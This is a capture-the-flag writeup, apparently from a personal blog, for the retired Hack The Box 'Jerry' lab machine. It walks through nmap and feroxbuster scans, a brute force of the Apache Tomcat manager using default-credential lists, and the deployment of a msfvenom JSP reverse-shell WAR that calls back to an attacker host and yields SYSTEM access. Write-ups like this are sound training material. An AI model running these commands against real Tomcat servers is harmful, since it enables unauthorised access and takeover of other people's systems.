Hack The Box Jerry Writeup

Published: September 9, 2024, updated: January 16, 2025

This is a writeup for the retired Hack The Box Jerry machine.

Solution summary

Solution

We run through the following steps to retrieve the flags:

  1. Find out frequently used default passwords for Tomcat instances.
  2. Craft a reverse shell payload using Metasploit’s msfvenom.
  3. Upload the reverse shell payload using Tomcat’s deploy mechanism and launch the reverse shell
  4. Read out the flags from the Administrator’s desktop.

Nmap

Did you know that on Linux, distributions commonly configure ping to be a setuid binary? Ping needs to send out raw (non-TCP) packets. Handling raw sockets required the CAP_NET_RAW capability on Linux.

For example, you can find the specific code that configures ping to be a setuid binary in NixOS right here.

# Nmap seems to be a bit stubborn without sudo, as it appears to think the host
# is down otherwise and blocking ping probes
sudo nmap -sV -sC -A -oX machines/jerry/nmap.xml \
  10.10.10.95

Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-09 10:38 JST
Nmap scan report for 10.10.10.95
Host is up (0.22s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2012|8|Phone|7 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 (88%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   291.39 ms 10.10.16.1
2   291.38 ms 10.10.10.95

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.62 seconds

To be sure we don’t miss any TCP ports, we run a second TCP-only scan:

sudo nmap -p- -sT -oX machines/jerry/nmap_tcp.xml 10.10.10.95

We don’t find any other open ports after running an exhaustive scan:

Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-09 10:44 JST
Nmap scan report for 10.10.10.95
Host is up (0.084s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds

Findings:

Apache Tomcat

Landing page of Jerry’s Apache Tomcat

Landing page of Jerry’s Apache Tomcat Open in new tab (full image size 117 KiB)

The ASF released Apache Tomcat version 7.0.88 in 2018. This version has a lot of vulnerabilities.

Three vulnerabilities look interesting because they’re low-complexity and can lead to an RCE.

It turns out that we can exploit a much easier vulnerability, as we’re going to see later.

We try to identify interesting paths within the address http://10.10.10.95:8080 using the tool feroxbuster:

feroxbuster --wordlist SecLists/Discovery/Web-Content/common.txt \
  --threads 10 --scan-limit 1 \
  --url http://10.10.10.95:8080 --silent | tee machines/jerry/feroxbuster.log

The following address sticks out:

http://10.10.10.95:8080/manager/html

Cracking the management panel password

Why don’t we brute-force our way into the management panel located at /manager/html? Here’s what we see when we try to access it without any authentication:

curl http://10.10.10.95:8080/manager/html -I

We get a 401 status code with Basic authentication required hinted at in the WWW-Authenticate header.

HTTP/1.1 401 Unauthorized
Server: Apache-Coyote/1.1
Cache-Control: private
Expires: Thu, 01 Jan 1970 02:00:00 EET
WWW-Authenticate: Basic realm="Tomcat Manager Application"
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Mon, 09 Sep 2024 09:15:37 GMT

We try to fuzz the password using Patator.

patator.py http_fuzz \
  url=http://10.10.10.95:8080/manager/html \
  method=GET \
  0=SecLists/Usernames/cirt-default-usernames.txt \
  1=SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt \
  user_pass=FILE0:FILE1 \
  -x ignore:code=401

admin:admin does the trick and we manage to log in. tomcat:s3cret also seems to work.

Logged in management screen

Logged in management screen Open in new tab (full image size 114 KiB)

Uploading a reverse shell

From /docs/manager-howto.html:

http://localhost:8080/manager/text/deploy?path=/foo

Upload the web application archive (WAR) file that is specified as the request data in this HTTP PUT request, install it into the appBase directory of our corresponding virtual host, and start, deriving the name for the WAR file added to the appBase from the specified path. The application can later be undeployed (and the corresponding WAR file removed) by use of the /undeploy command.

We craft a shell using msfvenom:

msfvenom --payload java/jsp_shell_reverse_tcp \
  --platform windows --arch x86 \
  LHOST=10.10.16.6 \
  LPORT=4444 \
  -f war > machines/jerry/msfvenom_shell.war

Then, we use CURL to upload the msfvenom_shell.war shell created by msfvenom.

curl -u "tomcat:s3cret" "http://10.10.10.95:8080/manager/text/deploy?path=/shell" \
  --upload-file machines/jerry/msfvenom_shell.war

The upload works:

OK - Deployed application at context path /shell

We launch Socat locally:

socat -d TCP4-LISTEN:4444 STDIO
# Somewhere else
curl http://10.10.10.95:8080/shell/

Retrieve flags

The shell works and we become a privileged user:

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
nt authority\system

We find the flags on the Administrator’s desktop:

dir C:\Users\Administrator\Desktop\flags\

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,397,736,960 bytes free

Print out the flags:

type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"

We find the flags:

user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Tags

I would be thrilled to hear from you! Please share your thoughts and ideas with me via email.

Back to Index